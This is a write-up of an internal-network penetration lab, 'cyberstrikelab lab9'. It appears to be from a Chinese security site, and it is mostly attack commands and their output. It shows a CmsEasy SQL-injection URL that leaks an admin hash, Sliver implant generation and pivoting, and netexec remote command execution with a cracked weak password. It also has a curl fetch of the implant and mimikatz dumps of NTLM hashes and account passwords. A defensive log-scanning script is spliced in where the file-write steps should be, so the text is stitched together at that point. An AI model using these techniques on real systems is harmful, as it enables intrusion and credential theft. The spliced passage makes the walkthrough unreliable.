cslab-lab9 Internal Network Penetration

admin · 2025-05-26 19:16:02 · 6 views · 36,598 characters · 121 min 59 s read

Thanks to @someb0dy for providing the lab9 writeup, shared here with everyone.

Difficulty: Easy

Video tutorial: https://www.bilibili.com/video/BV1u4j2zuEmk/

Lab target:

https://www.cyberstrikelab.com/#/scene/detail/39


Entry point - 172.5.33.6

```
❯ gogo -i 172.5.33.6 -p all -ev
[*] gogo: , 2025-05-22 14:10.48
[*] Current goroutines 1000 Version Level 1, Exploit: auto, PortSpray false , 2025-05-22 14:10.48
[*] Start task 172.5.33.6 ,total ports 368 , mod default , 2025-05-22 14:10.48
[*] too much ports , only show top 100 ports 8017,9095,8099,7010,11210,442,6001,8004,4848,8014,8763,10001,7005,8092,7000,8002,8007,3873,20882,7007,2379,9300,81,444,8000,7001,icmp,16201,22,84,8070,8880,8873,9990,8870,9097,8024,6984,33066,7890,9092,8222,23,50020,4430,8003,9443,15011,8300,9000,8015,9081,8878,9096,8899,10022,18090,11211,1001,7443,8765,8093,16000,winrm,901,70,3001,8012,5005,10250,13389,83,8091,27019,8085,8881,18088,8887,4443,8848,10002,143,8096,5672,10255,1099,21,2100,80,9004,1435,8087,7080,9094,9070,8882,443,1080,5601,1311...... , 2025-05-22 14:10.48
[*] Default Scan is expected to take 4 seconds , 2025-05-22 14:10.48
[+] winrm://172.5.33.6:5985    winrm:Windows 10 1607/Server2016(10.0.14393):default    WIN-784BAKDI0AC/WIN-784BAKDI0AC [winrm] WIN-784BAKDI0AC/WIN-784BAKDI0AC
[+] wmi://172.5.33.6:135       wmi:default/ [wmi] /
[+] http://172.5.33.6:80       Apache/2.4.39(Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02    poweredby:php/5.6.9||php||mod_fcgid [200] HTTP/1.1 200
[+] tcp://172.5.33.6:3306      mysql:guess [open]
[*] Alived 4, Total 368 , 2025-05-22 14:11.00
[*] Time consuming 12.361886167s , 2025-05-22 14:11.00
```

Port 80 - CmsEasy


v.7753

Corresponding official release:

https://www.cmseasy.cn/published/show-1596.html

```php
<?php
# CmsEasy Enterprise Content Management System
# Copyright (C) CmsEasy Co.,Ltd (https://www.CmsEasy.cn). All rights reserved.
define('_VERSION','7_7_5_20211012_UTF8');
define('_VERNUM','7.7.5.20211012');
define('_VERCODE','7753');
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) CmsEasy Co., Ltd. (https://www.CmsEasy.cn). All rights reserved.
```

Arbitrary file write

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞/#安装包下载

But this is an authenticated (backend) bug, so we need to log in first.

SQL injection

https://github.com/MzzdToT/CmsEasy_sql/blob/main/cmseasy_sql_scan.py

http://172.5.33.6/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5

Visiting this path returns:

```json
{
  "userid": "1",
  "username": "admin",
  "password": "a66abb5684c45962d887564f08346e8d",
  "nickname": "\u7ba1\u7406\u5458",
  "groupid": "2",
  "checked": "1",
  "qqlogin": "",
  "alipaylogin": "",
  "wechatlogin": "",
  "avatar": "",
  "userip": "",
  "state": "0",
  "qq": "1111",
  "e_mail": "[email protected]",
  "address": "admin",
  "tel": "admin",
  "question": "",
  "answer": "",
  "intro": "",
  "point": "0",
  "introducer": "0",
  "regtime": "0",
  "sex": "",
  "isblock": "0",
  "isdelete": "0",
  "headimage": "/html/upload/images/201907/15625455867367.png",
  "integration": "0",
  "couponidnum": "17:0:1",
  "collect": "2,4,3,46,14,73",
  "menoy": "100.07",
  "adddatetime": "2021-09-01 00:00:00",
  "notifiid": "",
  "templatelang": "cn",
  "adminlang": "cn",
  "buyarchive": "",
  "adminlangdomain": "",
  "templatelangdomain": "",
  "expired_time": "0"
}
```

This gives us the admin password's MD5 hash, which cracks to:

```
a66abb5684c45962d887564f08346e8d:admin123456
```
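From the defender's side, the crossall/execsql route above is the thing to alert on: the `sql` parameter is an opaque encrypted blob, so a rule cannot key on SQL keywords, but no legitimate visitor ever requests that route. The following is an added example (not part of the original writeup) that scans Apache combined-format access log lines for it; the log lines are constructed, not taken from the lab.

```python
"""Flag requests to CmsEasy's crossall/execsql SQL-execution route in an Apache access log."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined"/"common" log prefix. Assumption: the web server uses the stock format.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def _params(target: str) -> dict:
    """Lower-cased, single-valued view of a request target's query string."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return {k.lower(): v[0] for k, v in qs.items()}


def is_execsql_request(target: str) -> bool:
    """True when the request target addresses the crossall/execsql route (case-insensitive)."""
    p = _params(target)
    return p.get("case", "").lower() == "crossall" and p.get("act", "").lower() == "execsql"


def scan_access_log(lines):
    """Return one finding per execsql hit: (client ip, timestamp, HTTP status, sql blob length)."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        if is_execsql_request(m["target"]):
            blob = _params(m["target"]).get("sql", "")
            findings.append((m["ip"], m["ts"], int(m["status"]), len(blob)))
    return findings


# Constructed sample log (not from the lab): two benign requests and two execsql probes,
# the second of which uses mixed-case parameter names and URL-encoding.
SAMPLE_LOG = """\
10.0.0.7 - - [22/May/2025:14:12:01 +0800] "GET /?case=archive&act=show&aid=12 HTTP/1.1" 200 8431
10.0.0.9 - - [22/May/2025:14:12:07 +0800] "GET /?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5 HTTP/1.1" 200 611
10.0.0.7 - - [22/May/2025:14:12:09 +0800] "GET /html/upload/images/201907/15625455867367.png HTTP/1.1" 200 2048
10.0.0.9 - - [22/May/2025:14:12:30 +0800] "GET /index.php?Case=CrossAll&Act=ExecSQL&sql=AAAA%2BBBBB HTTP/1.1" 500 0
"""

if __name__ == "__main__":
    for ip, ts, status, n in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"[ALERT] {ip} hit crossall/execsql at {ts} (status {status}, {n}-byte sql blob)")
```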

File written successfully.

Webshell


A quick look with tasklist /svc shows no AV running.

Config

```
sliver (lab9) > cat config_database.php

<?php if (!defined('ROOT')) exit('Can\'t Access !');
return array (
'database'=>array(
'hostname'=>'localhost',        // MySQL server
'database'=>'eyou',             // database name
'user'=>'eyou',                 // database user
'password'=>'cyberstrike@2024', // database password
'prefix'=>'cmseasy_',           // table prefix
'encoding'=>'utf8',             // encoding
'type' => 'mysqli',             // database driver
),
);

sliver (lab9) > pwd

[*] C:\phpstudy_pro\WWW\config
```

Flag 1

```
sliver (lab9) > cat c:/flag.txt

[*] Supplied pattern c:/flag.txt matched file c:\flag.txt

go-flag{8EC18759-1F45-4C34-9743-95DAABCA5CC1}
```

Second subnet - 10.6.6.10

```
sliver (lab9) > ifconfig

+--------------------------------------+
| 以太网实例 2                         |
+--------------------------------------+
| # | IP Addresses | MAC Address       |
+---+--------------+-------------------+
| 2 | 10.6.6.10/24 | a0:0c:91:78:30:0d |
+--------------------------------------+

+----------------------------------------+
| 以太网实例 1                           |
+----------------------------------------+
|  # | IP Addresses  | MAC Address       |
+----+---------------+-------------------+
| 11 | 172.5.33.6/24 | 80:98:cb:ad:6d:db |
+----------------------------------------+
3 adapters not shown.
```

fscan - port scan

```
PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -p 1-65535
.\fscan2.exe -h 10.6.6.10/24 -p 1-65535

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0

[*] 扫描类型: all, 目标端口: 1-65535
[*] 开始信息扫描...
[*] CIDR范围: 10.6.6.0-10.6.6.255
[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255
[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255
[*] 最终有效主机数量: 256
[+] 目标 10.6.6.10       存活 (ICMP)
[+] 目标 10.6.6.55       存活 (ICMP)
[+] 目标 10.6.6.88       存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 65535 个有效端口
[+] 端口开放 10.6.6.88:139
[+] 端口开放 10.6.6.55:139
[+] 端口开放 10.6.6.10:139
[+] 端口开放 10.6.6.88:135
[+] 端口开放 10.6.6.55:135
[+] 端口开放 10.6.6.10:135
[+] 端口开放 10.6.6.55:88
[+] 端口开放 10.6.6.55:80
[+] 端口开放 10.6.6.10:80
[+] 端口开放 10.6.6.55:53
[+] 端口开放 10.6.6.55:389
[+] 端口开放 10.6.6.10:445
[+] 端口开放 10.6.6.55:445
[+] 端口开放 10.6.6.88:445
[+] 端口开放 10.6.6.55:464
[+] 端口开放 10.6.6.55:593
[+] 端口开放 10.6.6.55:636
[+] 端口开放 10.6.6.55:3268
[+] 端口开放 10.6.6.55:3269
[+] 端口开放 10.6.6.10:3306
[+] 端口开放 10.6.6.88:3389
[+] 端口开放 10.6.6.10:5985
[+] 端口开放 10.6.6.88:5985
[+] 端口开放 10.6.6.55:5985
[+] 端口开放 10.6.6.55:9389
```
```
PS C:\phpstudy_pro\WWW\config> .\fscan2.exe -h 10.6.6.10/24 -o 10.txt
.\fscan2.exe -h 10.6.6.10/24 -o 10.txt

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0

[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 10.6.6.0-10.6.6.255
[*] 已生成IP范围: 10.6.6.0 - 10.6.6.255
[*] 已解析CIDR 10.6.6.10/24 -> IP范围 10.6.6.0-10.6.6.255
[*] 最终有效主机数量: 256
[+] 目标 10.6.6.10       存活 (ICMP)
[+] 目标 10.6.6.55       存活 (ICMP)
[+] 目标 10.6.6.88       存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 10.6.6.10:3306
[+] 端口开放 10.6.6.88:445
[+] 端口开放 10.6.6.55:445
[+] 端口开放 10.6.6.10:445
[+] 端口开放 10.6.6.88:139
[+] 端口开放 10.6.6.55:139
[+] 端口开放 10.6.6.10:139
[+] 端口开放 10.6.6.88:135
[+] 端口开放 10.6.6.55:135
[+] 端口开放 10.6.6.10:135
[+] 端口开放 10.6.6.55:88
[+] 端口开放 10.6.6.55:80
[+] 端口开放 10.6.6.10:80
[+] 存活端口数量: 13
[*] 开始漏洞扫描...
[!] 扫描错误 10.6.6.10:3306 - Error 1130: Host 'WIN-784BAKDI0AC' is not allowed to connect to this MySQL server
[*] NetInfo
[*] 10.6.6.55
   [->] DC
   [->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.10
   [->] WIN-784BAKDI0AC
   [->] 172.5.33.6
   [->] 10.6.6.10
[*] 网站标题 http://10.6.6.10          状态码:200 长度:77272  标题:中文网页标题
[!] 扫描错误 10.6.6.10:445 - 无法确定目标是否存在漏洞
[*] NetInfo
[*] 10.6.6.88
   [->] cyberweb
   [->] 10.6.6.88
[!] 扫描错误 10.6.6.55:139 - netbios error
[!] 扫描错误 10.6.6.55:88 - Get "http://10.6.6.55:88": read tcp 10.6.6.10:49285->10.6.6.55:88: wsarecv: An existing connection was forcibly closed by the remote host.
[*] OsInfo 10.6.6.55    (Windows Server 2016 Standard 14393)
[!] 扫描错误 10.6.6.10:139 - netbios error
[!] 扫描错误 10.6.6.55:80 - Get "http://10.6.6.55": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[*] OsInfo 10.6.6.88    (Windows Server 2016 Standard 14393)
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393
[+] 扫描已完成: 13/13
[*] 扫描结束,耗时: 1m20.5048977s
```
```
PS C:\phpstudy_pro\WWW\config> cat result.txt
cat result.txt
[+] 端口开放 10.6.6.88:139
[+] 端口开放 10.6.6.55:139
[+] 端口开放 10.6.6.10:139
[+] 端口开放 10.6.6.88:135
[+] 端口开放 10.6.6.55:135
[+] 端口开放 10.6.6.10:135
[+] 端口开放 10.6.6.55:88
[+] 端口开放 10.6.6.55:80
[+] 端口开放 10.6.6.10:80
[+] 端口开放 10.6.6.55:53
[+] 端口开放 10.6.6.55:389
[+] 端口开放 10.6.6.10:445
[+] 端口开放 10.6.6.55:445
[+] 端口开放 10.6.6.88:445
[+] 端口开放 10.6.6.55:464
[+] 端口开放 10.6.6.55:593
[+] 端口开放 10.6.6.55:636
[+] 端口开放 10.6.6.55:3268
[+] 端口开放 10.6.6.55:3269
[+] 端口开放 10.6.6.10:3306
[+] 端口开放 10.6.6.88:3389
[+] 端口开放 10.6.6.10:5985
[+] 端口开放 10.6.6.88:5985
[+] 端口开放 10.6.6.55:5985
[+] 端口开放 10.6.6.55:9389
[+] 端口开放 10.6.6.10:47001
[+] 端口开放 10.6.6.88:47001
[+] 端口开放 10.6.6.88:49664
[+] 端口开放 10.6.6.10:49665
[+] 端口开放 10.6.6.10:49664
[+] 端口开放 10.6.6.55:49670
[+] 端口开放 10.6.6.10:49670
[+] 端口开放 10.6.6.88:49669
[+] 端口开放 10.6.6.55:49669
[+] 端口开放 10.6.6.10:49669
[+] 端口开放 10.6.6.88:49668
[+] 端口开放 10.6.6.55:49668
[+] 端口开放 10.6.6.55:49667
[+] 端口开放 10.6.6.10:49668
[+] 端口开放 10.6.6.88:49667
[+] 端口开放 10.6.6.10:49667
[+] 端口开放 10.6.6.88:49666
[+] 端口开放 10.6.6.10:49666
[+] 端口开放 10.6.6.88:49665
[+] 端口开放 10.6.6.55:49680
[+] 端口开放 10.6.6.88:49671
[+] 端口开放 10.6.6.55:49671
[+] 端口开放 10.6.6.88:49670
[+] 端口开放 10.6.6.55:49708
[+] 端口开放 10.6.6.55:49725
[*] NetInfo
[*] 10.6.6.10
   [->] WIN-784BAKDI0AC
   [->] 172.5.33.6
   [->] 10.6.6.10
[*] 网站标题 http://10.6.6.10          状态码:200 长度:77272  标题:中文网页标题
[*] NetInfo
[*] 10.6.6.55
   [->] DC
   [->] 10.6.6.55
[*] NetInfo
[*] 10.6.6.88
   [->] cyberweb
   [->] 10.6.6.88
[*] 网站标题 http://10.6.6.55          状态码:200 长度:703    标题:IIS Windows Server
[*] 网站标题 http://10.6.6.88:5985     状态码:404 长度:315    标题:Not Found
[*] 网站标题 http://10.6.6.88:47001    状态码:404 长度:315    标题:Not Found
[*] 网站标题 http://10.6.6.55:5985     状态码:404 长度:315    标题:Not Found
[*] NetBios 10.6.6.88       cyberweb.cyberstrikelab.com         Windows Server 2016 Standard 14393
[*] OsInfo 10.6.6.55    (Windows Server 2016 Standard 14393)
[*] OsInfo 10.6.6.88    (Windows Server 2016 Standard 14393)
[+] [发现漏洞] 目标: http://10.6.6.55  漏洞类型: poc-yaml-active-directory-certsrv-detect  漏洞名称:  详细信息: %!s(<nil>)
[*] 网站标题 http://10.6.6.10:5985     状态码:404 长度:315    标题:Not Found
[*] 网站标题 http://10.6.6.10:47001    状态码:404 长度:315    标题:Not Found
[+] RDP 10.6.6.88:3389:administrator qwe123!@#
```

Note the AD CS detection (certsrv on 10.6.6.55).

cyberweb - 10.6.6.88

RDP - weak password

Local account credentials:

10.6.6.88:3389:administrator qwe123!@#

Start a SOCKS proxy straight away:

```
sliver (lab9) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081
⚠️  In-band SOCKS proxies can be a little unstable depending on protocol
```
```
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'whoami'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         cyberweb\administrator
```

Microsoft Remote Desktop never managed to connect, so it's the command line from here.

Flag 2

```
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'dir c:\'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         驱动器 C 中的卷没有标签。
SMB         10.6.6.88       445    CYBERWEB         卷的序列号是 F667-4B31
SMB         10.6.6.88       445    CYBERWEB         c:\ 的目录
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:36                45 flag.txt
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:55    <DIR>          PerfLogs
SMB         10.6.6.88       445    CYBERWEB         2018/02/03  03:38    <DIR>          Program Files
SMB         10.6.6.88       445    CYBERWEB         2016/07/16  21:23    <DIR>          Program Files (x86)
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:58    <DIR>          smb
SMB         10.6.6.88       445    CYBERWEB         2025/04/22  16:07    <DIR>          Users
SMB         10.6.6.88       445    CYBERWEB         2025/02/19  18:11    <DIR>          Windows
SMB         10.6.6.88       445    CYBERWEB         1 个文件             45 字节
SMB         10.6.6.88       445    CYBERWEB         6 个目录 31,290,617,856 可用字节
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'type c:\flag.txt'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         go-flag{0A433C09-0529-4205-848D-6DADCE311646}
```

Pivots

```
sliver (lab9) > pivots

 ID   Protocol   Bind Address   Number Of Pivots
==== ========== ============== ==================
  1   TCP        0.0.0.0:9898                  0

sliver (lab9) > background

[*] Background ...

sliver > generate --tcp-pivot 10.6.6.10:9898 --os windows

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /Users/a/Desktop/tool/sliver/LARGE_POWER.exe
```

Set up a pivot so cyberweb can call back through 10.6.6.10.

I originally wanted to upload the implant over SMB, but through the proxy it was unstable and the upload kept failing.

So I served it from the web server on 10.6.6.10 instead.

```
❯ netexec smb 10.6.6.88 -u administrator -p 'qwe123!@#'   --local-auth  -x 'curl 10.6.6.10/LARGE_POWER.exe -o  c:\smb\LARGE_POWER.exe'
SMB         10.6.6.88       445    CYBERWEB         [*] Windows Server 2016 Standard 14393 x64 (name:CYBERWEB) (domain:CYBERWEB) (signing:False) (SMBv1:True)
SMB         10.6.6.88       445    CYBERWEB         [+] CYBERWEB\administrator:qwe123!@# (Pwn3d!)
SMB         10.6.6.88       445    CYBERWEB         [+] Executed command via wmiexec
SMB         10.6.6.88       445    CYBERWEB         'curl' 不是内部或外部命令，也不是可运行的程序
SMB         10.6.6.88       445    CYBERWEB         或批处理文件。
```

Even after getting it uploaded, the implant still wouldn't call back.

Mimikatz

Ran mimikatz through wmiexec instead:

```
c:\smb>mimikatz.exe "sekurlsa::debug " "sekurlsa::logonpasswords" "exit" > pssword.txt

  .#####.   mimikatz 2.1.1 (x64) #17763 Dec  9 2018 23:56:50
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::debug
ERROR mimikatz_doLocal ; "debug" command of "sekurlsa" module not found !

Module :        sekurlsa
Full name :     SekurLSA module
Description :   Some commands to enumerate credentials...

             msv  -  Lists LM & NTLM credentials
         wdigest  -  Lists WDigest credentials
        kerberos  -  Lists Kerberos credentials
           tspkg  -  Lists TsPkg credentials
         livessp  -  Lists LiveSSP credentials
             ssp  -  Lists SSP credentials
  logonPasswords  -  Lists all available providers credentials
         process  -  Switch (or reinit) to LSASS process  context
        minidump  -  Switch (or reinit) to LSASS minidump context
             pth  -  Pass-the-hash
          krbtgt  -  krbtgt!
     dpapisystem  -  DPAPI_SYSTEM secret
           trust  -  Antisocial
      backupkeys  -  Preferred Backup Master keys
         tickets  -  List Kerberos tickets
           ekeys  -  List Kerberos Encryption Keys
           dpapi  -  List Cached MasterKeys
         credman  -  List Credentials Manager

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1780709 (00000000:001b2be5)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : CYBERWEB$
         * Domain   : cyberstrikelab.com
         * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
        ssp :
        credman :

Authentication Id : 0 ; 1780585 (00000000:001b2b69)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 16:58:36
SID               : S-1-5-90-0-3
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : CYBERWEB$
         * Domain   : cyberstrikelab.com
         * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
        ssp :
        credman :

Authentication Id : 0 ; 51034 (00000000:0000c75a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : CYBERWEB$
         * Domain   : cyberstrikelab.com
         * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:09
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : cyberweb$
         * Domain   : CYBERSTRIKELAB.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 306483 (00000000:0004ad33)
Session           : Interactive from 0
User Name         : cslab
Domain            : CYBERSTRIKELAB
Logon Server      : DC
Logon Time        : 2025/5/22 15:31:45
SID               : S-1-5-21-4286488488-1212600890-1604239976-1104
        msv :
         [00000003] Primary
         * Username : cslab
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 39b0e84f13872f51efb3b8ba5018c517
         * SHA1     : fa6a465532224cc4f1fa5094424bf219d25b7463
         * DPAPI    : 432dfb0f990f2cc292b2fd09468aab5e
        tspkg :
        wdigest :
         * Username : cslab
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : cslab
         * Domain   : CYBERSTRIKELAB.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 131588 (00000000:00020204)
Session           : Interactive from 1
User Name         : Administrator
Domain            : CYBERWEB
Logon Server      : CYBERWEB
Logon Time        : 2025/5/22 7:29:19
SID               : S-1-5-21-332097019-2215467117-1557799732-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : CYBERWEB
         * NTLM     : c377ba8a4dd52401bc404dbe49771bbc
         * SHA1     : d9ac14100bf4e36f6807dd3c29051983b2d58d3d
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : CYBERWEB
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : CYBERWEB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:16
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 51057 (00000000:0000c771)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:15
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * Password : (null)
        kerberos :
         * Username : CYBERWEB$
         * Domain   : cyberstrikelab.com
         * Password : I@w2(l8:$e9`bRA7&$Rxd^f@6+_,hgL)&Ck6he8vlsS7*=[e*%bh-wZ.,$HV(0^!/q0eY=sDH_1)6jK3v;#%kt[5YSXt3$y/;R(wAqp1p_`""m=o:Q;HtsY
        ssp :
        credman :

Authentication Id : 0 ; 23220 (00000000:00005ab4)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:06
SID               :
        msv :
         [00000003] Primary
         * Username : CYBERWEB$
         * Domain   : CYBERSTRIKELAB
         * NTLM     : 331dcbb88d1a4847c97eab7c1c168ac8
         * SHA1     : 0a4c17b8f051223716e86c36f1dec902e266c773
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CYBERWEB$
Domain            : CYBERSTRIKELAB
Logon Server      : (null)
Logon Time        : 2025/5/22 7:28:05
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : CYBERWEB$
